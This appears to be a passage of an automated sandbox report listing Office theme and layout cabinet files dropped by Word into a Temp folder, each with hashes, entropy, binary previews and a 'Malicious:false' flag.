                                    Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....

                                    C:\Users\user\AppData\Local\Temp\cab9C65.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):21791
                                    Entropy (8bit):7.65837691872985
                                    Encrypted:false
                                    SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                    MD5:7BF88B3CA20EB71ED453A3361908E010
                                    SHA1:F75F86557051160507397F653D7768836E3B5655
                                    SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                    SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                    Malicious:false
                                    Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...

                                    C:\Users\user\AppData\Local\Temp\cab9CB7.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):22594
                                    Entropy (8bit):7.674816892242868
                                    Encrypted:false
                                    SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                    MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                    SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                    SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                    SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                    Malicious:false
                                    Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~

                                    C:\Users\user\AppData\Local\Temp\cab9E17.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):271273
                                    Entropy (8bit):7.995547668305345
                                    Encrypted:true
                                    SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                    MD5:21437897C9B88AC2CB2BB2FEF922D191
                                    SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                    SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                    SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                    Malicious:false
                                    Preview:MSCF....Q.......D...............y...........Q...XJ..........{..................M.. .content.inf.(..........M.. .Frame.thmx.1....b..[.........B.....6....ZZ}....BH..-D..}..V.V-........Z..O.....H.f..........;..@d.`......!..=;.,bp..K.q....s.y....D.qZ)p......D...r.S....s=B.4.).8B....4.a6 ...~........."....#.....}....n.Q.1cH.%c/.U....E..E...!..Da*.p....X..G..:.....1.@.....W.'...._........W.c...<.v.k.....&.8......?.h.>d._:-.X.......9..tL}........3.;.N3.D~......>.^?..|:...}......oT.z.......w..[..}:...._fu........Kk.......L..9..p..e..^......K.%...Mapqhvv..E&.^.....[...9|"l...9...U......!..w..Nya...~C.yx...w.K..q.z.j.W?t.......DY.x.S2.....]..na.Qj...X.K..^...S.hK.W...Z....s.0...NF...8C.......j.'Zc...k.%...l....S.....OW..o.Qf.x...X.;<.rO].....W.m.e....T.1.6........".....Q.3........l..v.."..I...&......w..4vE...c.s[.3.m..8.q$.....a...)...&:6..,..#..?....;.!.....~.UP.r=.}h.&U......X...]..X.e\u.G<....E....lG.@.*Z...10.D@.]....z+-.S....p..Y.PK.:.S..p.....1E`..-

                                    C:\Users\user\AppData\Local\Temp\cab9E18.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):222992
                                    Entropy (8bit):7.994458910952451
                                    Encrypted:true
                                    SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                    MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                    SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                    SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                    SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                    Malicious:false
                                    Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....

                                    C:\Users\user\AppData\Local\Temp\cab9EE6.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):295527
                                    Entropy (8bit):7.996203550147553
                                    Encrypted:true
                                    SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                    MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                    SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                    SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                    SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                    Malicious:false
                                    Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p

                                    C:\Users\user\AppData\Local\Temp\cab9EE7.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):261258
                                    Entropy (8bit):7.99541965268665
                                    Encrypted:true
                                    SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                    MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                    SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                    SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                    SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                    Malicious:false
                                    Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...

                                    C:\Users\user\AppData\Local\Temp\cab9EE8.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):276650
                                    Entropy (8bit):7.995561338730199
                                    Encrypted:true
                                    SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                    MD5:84D8F3848E7424CBE3801F9570E05018
                                    SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                    SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                    SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                    Malicious:false
                                    Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....

                                    C:\Users\user\AppData\Local\Temp\cab9F09.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):307348
                                    Entropy (8bit):7.996451393909308
                                    Encrypted:true
                                    SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                                    MD5:0EBC45AA0E67CC435D0745438371F948
                                    SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                    SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                    SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                    Malicious:false
                                    Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...

                                    C:\Users\user\AppData\Local\Temp\cab9F4B.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):230916
                                    Entropy (8bit):7.994759087207758
                                    Encrypted:true
                                    SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                    MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                    SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                    SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                    SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                    Malicious:false
                                    Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....

                                    C:\Users\user\AppData\Local\Temp\cabA0A6.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):550906
                                    Entropy (8bit):7.998289614787931
                                    Encrypted:true
                                    SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                    MD5:1C12315C862A745A647DAD546EB4267E
                                    SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                    SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                    SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                    Malicious:false
                                    Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.

                                    C:\Users\user\AppData\Local\Temp\cabA134.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):640684
                                    Entropy (8bit):7.99860205353102
                                    Encrypted:true
                                    SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                    MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                    SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                    SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                    SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                    Malicious:false
                                    Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e

                                    C:\Users\user\AppData\Local\Temp\cabA1F2.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):723359
                                    Entropy (8bit):7.997550445816903
                                    Encrypted:true
                                    SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                    MD5:748A53C6BDD5CE97BD54A76C7A334286
                                    SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                    SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                    SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                    Malicious:false
                                    Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-

                                    C:\Users\user\AppData\Local\Temp\cabA203.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):698244
                                    Entropy (8bit):7.997838239368002
                                    Encrypted:true
                                    SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                    MD5:E29CE2663A56A1444EAA3732FFB82940
                                    SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                    SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                    SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                    Malicious:false
